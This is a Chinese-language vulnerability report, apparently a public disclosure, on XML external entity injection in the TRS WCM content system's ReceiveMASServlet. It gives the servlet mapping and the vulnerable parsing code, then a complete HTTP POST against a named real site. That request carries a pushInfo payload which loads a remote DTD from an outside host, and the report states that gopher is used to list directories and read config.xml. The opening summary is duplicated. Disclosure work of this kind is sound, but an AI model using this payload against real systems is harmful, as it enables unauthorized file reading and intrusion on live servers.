### 简要描述: 貌似是后续更新的时候添加的一个功能,通杀较新版本。 ### 详细说明: 其实还是XML实体注入,不过这次是用的DOM解析XML。 web.xml中配置的Servlet ReceiveMASServlet: ``` <servlet> <servlet-name>ReceiveMASServlet</servlet-name> <servlet-class>com.trs.components.video.ReceiveMASServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>ReceiveMASServlet</servlet-name> <url-pattern>/app/video/ReceiveMASServlet</url-pattern> </servlet-mapping> ``` 对应的com/trscomponents/video/ReceiveMASServlet.java代码如下: ``` protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String event = request.getParameter("event"); String string = request.getParameter("pushInfo"); LOG.info("push event: " + event); LOG.info("push pushInfo: " + string); if (string != null) { Element root = SimpleConsoleLogger.parserXml(string);//解析XML入口 if (root.element("time") != null || "time".equals(root.element("time"))) { ``` 获取pushInfo参数的数值,然后SimpleConsoleLogger.parserXml()解析XML,方法如下: ``` public static...
### 简要描述: 貌似是后续更新的时候添加的一个功能,通杀较新版本。 ### 详细说明: 其实还是XML实体注入,不过这次是用的DOM解析XML。 web.xml中配置的Servlet ReceiveMASServlet: ``` <servlet> <servlet-name>ReceiveMASServlet</servlet-name> <servlet-class>com.trs.components.video.ReceiveMASServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>ReceiveMASServlet</servlet-name> <url-pattern>/app/video/ReceiveMASServlet</url-pattern> </servlet-mapping> ``` 对应的com/trscomponents/video/ReceiveMASServlet.java代码如下: ``` protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String event = request.getParameter("event"); String string = request.getParameter("pushInfo"); LOG.info("push event: " + event); LOG.info("push pushInfo: " + string); if (string != null) { Element root = SimpleConsoleLogger.parserXml(string);//解析XML入口 if (root.element("time") != null || "time".equals(root.element("time"))) { ``` 获取pushInfo参数的数值,然后SimpleConsoleLogger.parserXml()解析XML,方法如下: ``` public static Element parserXml(String fileName) { Element root = null; try { System.out.println("filename:" + fileName); Document document = DocumentHelper.parseText(fileName);//DOM解析XML root = document.getRootElement(); } catch (DocumentException e) { e.printStackTrace(); } return root; } ``` 以上调用DocumentHelper.parseText()解析XML。 同样的还是burpsuite直接发送以下包: ``` POST /wcm/app/video/ReceiveMASServlet HTTP/1.1 Host: cms.ce.cn User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=70C0A254A8662618477A7C2C709C614A Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 101 pushInfo=<!DOCTYPE+root+[<!ENTITY+%25+remote+SYSTEM+"http%3a//ip/1.xml">%25remote%3b]> ``` 由于trswcm默认jdk是<1.7的所以在1.xml中用gopher协议控制读取文件列目录等操作,以cms.ce.cn为例进行测试,列目录: [<img src="https://images.seebug.org/upload/201510/102342261e75937457bf3977186290bbe1f72884.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/102342261e75937457bf3977186290bbe1f72884.png) 读取文件config.xml: [<img src="https://images.seebug.org/upload/201510/10234718214b174cc38abc1b1bd696cc7d639169.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/10234718214b174cc38abc1b1bd696cc7d639169.png) ### 漏洞证明: 同上
